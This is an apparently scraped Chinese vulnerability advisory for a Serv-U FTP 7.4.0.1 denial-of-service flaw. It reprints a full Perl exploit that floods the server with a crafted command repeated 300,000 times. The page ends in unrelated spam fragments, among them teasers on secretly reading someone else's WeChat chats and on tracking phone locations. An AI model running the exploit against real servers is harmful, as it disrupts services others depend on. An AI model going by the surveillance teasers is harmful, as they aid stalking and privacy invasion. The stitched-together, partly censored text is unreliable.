影响版本:
RhinoSoft Serv-U 7.4.0.1
漏洞描述:
BUGTRAQ ID: 34127
Serv-U FTP是一款FTP服务程序。
如果远程攻击者向Serv-U FTP服务器发送特制 *** NT请求的话,就可以导致服务器停止响应。<*参考
Jonathan Salwan (submit@shell-storm.org)
*>
SEBUG安全建议:
厂商补丁:
RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serv-u.com/
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/perl
# Soft : FTP Serv-U
# Version : v7.4.0.1
#
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)
# Just the server is saturated, it stops responding.
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan \n";
print "[+] Soft: FTP Serv-U\n";
if (@ARGV < 3)
{
print "[*] Usage: <serv-u.pl> <host> <port>\n";
print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending request...\n";
$evil = " *** NT\r\n" x 300000;
$after = "\x2A\x2A";
print $socket "USER $user\r\n";
print $socket "PASS $pass.$after\r\n";
print $socket "$evil";
sleep(1);
close($socket);
print "[+]Done! the server is saturated.\n";
老公和别人的微信聊天记录怎么查看 怎么样查看电脑里的微信聊天 波场dapp——TronBank曾于凌晨遭到假币攻击,1小时内被盗走约1.7亿枚BTT(价值约85万米)!黑客创建了名为BTTx的假币向...
Avast是一款欧洲知名的杀毒软件,其凭借强大的杀毒能力和免费使用的特点赢得了诸多用户。但现在,由于捆绑软件多和用户质量下降等原因,这款杀毒软件被越来越多的人视为流氓软件。 近...
怎么监控别人微信聊天记录吗 微信怎么看聊天记录|微信密码忘了 泰国驻华使馆25日在北京举办电子签证系统启动仪式。泰国外交部领事司司长察迪·安乍纳南表示,为了给前往泰国的旅客提供便利,泰国开发了电子签...
微信朋友圈封了怎么解封(朋友圈永久封如何解除),比年来,短视频可谓是一片火海。快手和哆嗦等领域正在快突起。这些短视频领域也成为咱们每天刷流量的好去向。 微信朋友圈封了怎么解封 1.昨年,腾讯以“范...
黑客教你定位手机号码 分享给大家手机定位追踪教程,经常看港剧的朋友们肯定都记得这样一个情节,警察在监听勒索赎金的绑匪电话时,都会要求电话时常可以久一点,这样他们就可以更精确地进行手机号码定位追踪了,相...
苹果的状态页面显示,通过FaceTime进行的群组通话“暂时不可用”—— 这是一个止损举动,同时,苹果本周将对此问题提供更完善的解决方案。不久之前我们前尝试设置群组通话时无果,但是现在漏洞已经被修复了...